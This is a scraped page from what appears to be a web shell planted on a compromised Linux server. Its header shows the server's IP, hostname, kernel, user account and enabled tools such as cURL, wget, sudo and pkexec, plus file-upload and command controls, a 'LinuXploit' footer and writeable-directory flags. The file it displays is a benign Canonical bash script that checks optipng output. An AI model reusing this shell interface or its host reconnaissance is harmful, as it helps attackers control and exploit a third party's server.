403Webshell
Server IP : 159.253.20.91  /  Your IP : 216.73.216.111
Web Server : nginx/1.20.2
System : Linux se38c9e53.fastvps-server.com 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64
User : pr11_ru_usr ( 1041)
PHP Version : 8.1.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/optipng/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/optipng/examples/optipng-check
#!/bin/bash

# Read a list of file paths from stdin (such as produced by find) and verify
# that running optipng on them will produce an output file which looks
# identical. This is checked by converting original and new file to PPM and
# checking for identical output.
#
# Author: Martin Pitt <martin.pitt@ubuntu.com>
# (C) 2010 Canonical Ltd.
#
# This software is distributed under the same licensing and warranty terms as
# OptiPNG.  Please see the attached LICENSE for more info.

set -e

if ! type convert >/dev/null 2>&1; then
    echo "ERROR: Please install imagemagick" >&2
    exit 1
fi

workdir=`mktemp -d`
trap "rm -r '$workdir'" 0 HUP INT QUIT ILL ABRT FPE SEGV PIPE TERM
out=$workdir/out.png

while read f; do
    if ! optipng -o4 -quiet -out $out "$f"; then
    echo "SKIP: optipng cannot process $f"
    continue
    fi
    if ! cmp <(convert -depth 24 "$f" ppm:-) <(convert -depth 24 "$out" ppm:-); then
    echo "FAIL: Different result on $f" >&2
    exit 1
    fi
    echo "OK: $f"
    rm $out
done

Youez - 2016 - github.com/yon3zu
LinuXploit